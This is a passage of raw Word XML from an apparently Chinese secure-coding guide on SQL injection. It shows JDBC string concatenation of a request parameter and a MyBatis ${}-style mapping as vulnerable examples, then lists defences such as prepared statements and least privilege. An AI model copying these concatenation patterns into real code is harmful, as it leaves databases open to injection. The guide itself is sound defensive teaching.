          <w:p w:rsidR="00A66FD7" w:rsidRDefault="00A66FD7" w:rsidP="00D30C12">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:t>JdbcConnection conn = new JdbcConnection();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A66FD7" w:rsidRDefault="00A66FD7" w:rsidP="00D30C12">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:t>final String sql = "select * from product where pname like '%"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A66FD7" w:rsidRDefault="00A66FD7" w:rsidP="00D30C12">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">+ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">request.getParameter("pname") </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:i/>
              </w:rPr>
              <w:t>+ "%'";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A66FD7" w:rsidRDefault="00A66FD7" w:rsidP="00D30C12">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
              </w:rPr>
              <w:t>conn.execqueryResultSet(sql);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A66FD7" w:rsidRDefault="00A66FD7" w:rsidP="00224AE4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D69E3" w:rsidRDefault="00AB7DB3" w:rsidP="002D50AC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r w:rsidR="003D69E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例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3D69E3" w:rsidTr="00D30C12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003D69E3" w:rsidRDefault="003D69E3" w:rsidP="00D30C12">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="宋体"/>
                <w:i/>
                <w:color w:val="454545"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="宋体"/>
                <w:i/>
                <w:color w:val="454545"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;select id="</w:t>
            </w:r>
            <w:r w:rsidR="00420F04">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="宋体"/>
                <w:i/>
                <w:color w:val="454545"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>findByUsername</w:t>
            </w:r>
            <w:r w:rsidR="005236B6">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="宋体"/>
                <w:i/>
                <w:color w:val="454545"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>" resultMap="</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="宋体"/>
                <w:i/>
                <w:color w:val="454545"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ResultMap"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003D69E3" w:rsidRDefault="003D69E3" w:rsidP="00D30C12">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="宋体"/>
                <w:i/>
                <w:color w:val="454545"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="宋体"/>
                <w:i/>
                <w:color w:val="454545"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>select * from table where name like '%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="宋体"/>
                <w:b/>
                <w:i/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r w:rsidR="00DC096F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="宋体"/>
                <w:b/>
                <w:i/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="宋体"/>
                <w:b/>
                <w:i/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="宋体"/>
                <w:i/>
                <w:color w:val="454545"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>%'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003D69E3" w:rsidRPr="00A35015" w:rsidRDefault="00A35015" w:rsidP="00D30C12">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="宋体"/>
                <w:i/>
                <w:color w:val="454545"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="宋体"/>
                <w:i/>
                <w:color w:val="454545"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;/select&gt; </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003D69E3" w:rsidRPr="00220452" w:rsidRDefault="002D50AC" w:rsidP="00220452">
      <w:pPr>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D50AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时，</w:t>
      </w:r>
      <w:r w:rsidRPr="002D50AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mybatis</w:t>
      </w:r>
      <w:r w:rsidRPr="002D50AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有使用预编译语句，它会先进行字符串拼接再执行编译，这个过程正是</w:t>
      </w:r>
      <w:r w:rsidRPr="002D50AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="002D50AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入生效的过程。因此在编写</w:t>
      </w:r>
      <w:r w:rsidRPr="002D50AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mybatis</w:t>
      </w:r>
      <w:r w:rsidRPr="002D50AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的映射语句时，尽量采用“</w:t>
      </w:r>
      <w:r w:rsidRPr="002D50AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#{xxx}</w:t>
      </w:r>
      <w:r w:rsidRPr="002D50AC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”这样的格式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004425E1" w:rsidRPr="00C26930" w:rsidRDefault="004425E1" w:rsidP="004425E1">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>解决</w:t>
      </w:r>
      <w:r>
        <w:t>方案</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F039B" w:rsidRPr="007F039B" w:rsidRDefault="007F039B" w:rsidP="00F52FCF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入发生的最根本原因在于用户输入的数据与程序进行拼接。</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防御</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入遵循的基本原则是数据与代码分离。防御方案与要求</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F039B" w:rsidRPr="007F039B" w:rsidRDefault="007F039B" w:rsidP="007F039B">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前端过滤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F039B" w:rsidRPr="007F039B" w:rsidRDefault="007F039B" w:rsidP="00BC3C0E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前端代码验证参数也是一种防御</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入的一种方式，一旦发现特殊字符则进行过滤或者转义操作。当然这是一种治标不治本的防御方法，前端无论如何通过脚本代码过滤转义总是可以被绕过的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F039B" w:rsidRPr="007F039B" w:rsidRDefault="007F039B" w:rsidP="007F039B">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用预编译语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F039B" w:rsidRPr="00F52FCF" w:rsidRDefault="00F52FCF" w:rsidP="00F52FCF">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F52FCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最佳方式是使用预编译语句，绑定变量，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52FCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52FCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句的语义不会改变</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52FCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F039B" w:rsidRPr="007F039B" w:rsidRDefault="007F039B" w:rsidP="007F039B">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全存储过程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F039B" w:rsidRPr="00F52FCF" w:rsidRDefault="00F52FCF" w:rsidP="00F52FCF">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F52FCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用安全的存储过程对抗</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52FCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52FCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入，前提是避免使用动态</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52FCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52FCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52FCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F039B" w:rsidRPr="007F039B" w:rsidRDefault="007F039B" w:rsidP="007F039B">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最小权限原则</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F039B" w:rsidRDefault="00F52FCF" w:rsidP="00F52FCF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库使用最小权限原则，避免使用</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等权限</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F039B" w:rsidRPr="007F039B" w:rsidRDefault="007F039B" w:rsidP="007F039B">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防御注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00073AE3" w:rsidRPr="004425E1" w:rsidRDefault="007F039B" w:rsidP="00387CB1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J2ee</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目中最为常用的</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据访问层框架，那么它是怎么防御</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入的的呢</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?Mybatis</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认就是</w:t>
      </w:r>
      <w:r w:rsidRPr="002D25D9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>采用预编译语句的方式，通过占位符绑定参数</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，具体形式有两种</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:#{password}</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>${password}</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#{password}</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式默认就是采用预编译语句方式实现，不会存在</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入情况，而</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>${password}</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F039B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式，通过拼接字符串实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA55FF" w:rsidRPr="00C26930" w:rsidRDefault="00AA55FF" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA55FF" w:rsidRPr="00C26930" w:rsidRDefault="00AA55FF" w:rsidP="00AA55FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F6C56" w:rsidRDefault="005F6C56" w:rsidP="005F6C56">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>代码注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00C26930">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007260E5" w:rsidRPr="007260E5" w:rsidRDefault="007260E5" w:rsidP="00335F35">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
